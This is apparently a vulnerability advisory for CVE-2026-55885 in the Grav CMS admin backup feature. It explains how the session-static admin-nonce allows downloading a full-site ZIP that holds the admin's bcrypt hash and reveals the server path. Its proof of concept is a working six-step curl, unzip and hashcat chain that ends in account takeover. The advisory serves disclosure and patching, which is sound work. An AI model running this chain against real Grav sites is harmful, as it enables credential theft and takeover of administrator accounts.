PT-2026-50744 · Packagist · Getgrav/Grav

Published

2026-06-18

·

Updated

2026-06-18

·

CVE-2026-55885

CVSS v3.1

6.8

Medium

VectorAV:N/AC:L/PR:H/UI:N/S:C/C:H/I:N/A:N

Summary

An authenticated administrator with backup permissions can download a ZIP archive containing the full Grav installation root, including user/accounts/admin.yaml with the admin's bcrypt password hash and email, plus user/config/ with all site configuration. The download endpoint requires only the session-static admin-nonce in the URL, no additional form-level CSRF token, and reveals the server's full filesystem path in a Base64-encoded query parameter. Combined with the absence of login rate limiting on http://{Grav URL}/admin, an attacker who obtains a single admin-nonce value (via Referrer leakage, browser history, or XSS) can exfiltrate password hashes for offline cracking and achieve account takeover.

Details

The vulnerability chain spans three components in the deployed Grav source tree at /var/www/html/grav/:
1. Backup archive scope — Backups::backup() /var/www/html/grav/system/src/Grav/Common/Backup/Backups.php:201-272
The backup() static method creates a ZIP of the directory specified by the backup profile's root property. The default profile (ID 0, named default site backup) backs up the entire Grav root directory. On line 225, when the root is not a stream URI, it falls back to the full installation path:
php
// Backups.php:225
$backup root = rtrim(GRAV ROOT . $backup->root, DS) ?: DS;
Since the default profile ships with no root override, $backup->root is empty, making $backup root equal to GRAV ROOT — i.e. /var/www/html/grav/. The archive therefore captures the entire installation including:
  • /var/www/html/grav/user/accounts/ — admin password hash, email, full name, granular permissions
  • /var/www/html/grav/user/config/ — system settings, potentially email SMTP credentials
The exclude files and exclude paths options on lines 232-235 are empty by default and offer no protection against including account files.
2. Backup download handler — AdminController::taskBackup() /var/www/html/grav/user/plugins/admin/classes/plugin/AdminController.php:517-573
After creating the backup ZIP, the controller Base64-encodes the full filesystem path and embeds it directly in a download URL displayed to the admin:
php
// AdminController.php:558-560
$download = urlencode(base64 encode($backup));
$url = rtrim(...) . '/task' . $param sep . 'backup/download' . $param sep
    . $download . '/admin-nonce' . $param sep . Utils::getNonce('admin-form');
The download handler (lines 532-541) decodes the path, locates the file via the backup:// stream, and serves it with Utils::download($file, true). It performs only two checks: the filename must end in .zip and the file must actually exist. It does not verify the file belongs to the requesting user, does not enforce a form-level nonce, and does not tie the download to a specific session.
3. Nonce validation — permissive The backup route is protected only by the admin-nonce parameter appended to the URL path. This nonce is session-static and shared across every admin page. No form-nonce is required — unlike page saves or configuration changes which demand both admin-nonce and form-nonce. This makes the backup download exploitable via a single crafted GET request from any attacker who knows the nonce value.

PoC

Prerequisites: Admin session with valid admin-nonce.
Step 1 — Authenticate and extract the session-static nonces:
bash
# Get login page, extract login-nonce, authenticate
NONCE=$(curl -s -c /tmp/jar "http://127.0.0.1/grav/admin" 
 | grep -oP 'name="login-nonce" value="K[^"]+')
curl -s -b /tmp/jar -c /tmp/jar -X POST "http://127.0.0.1/grav/admin" 
 --data-urlencode "data[username]=admin" 
 --data-urlencode "data[password]=Passw0rd123!" 
 --data-urlencode "task=login" 
 --data-urlencode "login-nonce=${NONCE}"

# Extract the admin-nonce (same value on every admin page)
ADMIN NONCE=$(curl -s -b /tmp/jar "http://127.0.0.1/grav/admin" 
 | grep -oP 'admin-nonce[:=]K[a-f0-9]+' | head -1)
echo "Admin nonce: $ADMIN NONCE"  # e.g. 68d6b108bc1398028365fb35ea760baf
Step 2 — Trigger a backup (single GET, no form-nonce needed):
bash
curl -s -b /tmp/jar 
 "http://127.0.0.1/grav/admin/tools/backups.json/task:backup/admin-nonce:${ADMIN NONCE}"
Response:
json
{
 "status": "success",
 "message": "Your backup is ready for download. <a href="/grav/admin/task:backup/download:L3Zhci93d3cvaHRtbC9ncmF2L2JhY2t1cC9kZWZhdWx0X3NpdGVfYmFja3VwLS0yMDI2MDYxNjEyMjQ0OS56aXA=/admin-nonce:68d6b108..." class="button">Download backup</a>"
}
Step 3 — Extract the Base64 download token and fetch the ZIP:
bash
# The download path is base64("/var/www/html/grav/backup/default site backup--20260616122449.zip")
# This reveals the full server filesystem path.
curl -s -b /tmp/jar -o /tmp/backup.zip 
 "http://127.0.0.1/grav/admin/task:backup/download:L3Zhci93d3cvaHRtbC9ncmF2L2JhY2t1cC9kZWZhdWx0X3NpdGVfYmFja3VwLS0yMDI2MDYxNjEyMjQ0OS56aXA=/admin-nonce:${ADMIN NONCE}"
Step 4 — Extract the password hash from the ZIP:
bash
unzip -p /tmp/backup.zip "user/accounts/admin.yaml"
Output:
yaml
state: enabled
email: admin@grav.com
fullname: 'Grav Admin'
title: Administrator
access:
 admin:
  login: true
  super: true
 site:
  login: true
hashed password: $2y$12$8StgOltcNbU5JD.D9Y5LmerDs.XBwLy5vSO3/9ReDYHjbv/aZTZ3m
Step 5 — Crack the bcrypt hash offline:
bash
echo '$2y$12$8StgOltcNbU5JD.D9Y5LmerDs.XBwLy5vSO3/9ReDYHjbv/aZTZ3m' > hash.txt
hashcat -m 3200 -a 0 hash.txt /usr/share/wordlists/rockyou.txt
Step 6 — Log in with the cracked password (no rate limit):
bash
curl -s -b /tmp/jar -c /tmp/jar -X POST "http://127.0.0.1/grav/admin" 
 --data-urlencode "data[username]=admin" 
 --data-urlencode "data[password]=<cracked password>" 
 --data-urlencode "task=login" 
 --data-urlencode "login-nonce=${NONCE}"

Impact

  • Type: Authenticated sensitive data exposure enabling offline credential theft
  • Attack surface: Any actor who can obtain admin-nonce (session fixation, reflected XSS, Referrer header leakage, browser history inspection, or proxy log access)
  • Exposed data: Admin username, email, full name, granular permission structure, bcrypt password hash ($2y$12$...), and full site configuration from user/config/
  • Downstream risk: Offline hashcat cracking bypasses all server-side brute-force protections. With no login rate limiting (Finding 1), a cracked hash grants immediate unrestricted admin access including file modification and arbitrary code execution potential through Twig/themes
  • Server path leakage: The Base64-encoded download token reveals the absolute filesystem path /var/www/html/grav/backup/ — information critical for LFI, file-write, and path traversal attacks

Fix

Insufficiently Protected Credentials

Cleartext Storage of Sensitive Information

Found an issue in the description? Have something to add? Feel free to write us 👾
dbugs@ptsecurity.com

Weakness Enumeration

CWE-522CWE-312

Related Identifiers

CVE-2026-55885
GHSA-2F86-9CP8-6HCF

Affected Products

Getgrav/Grav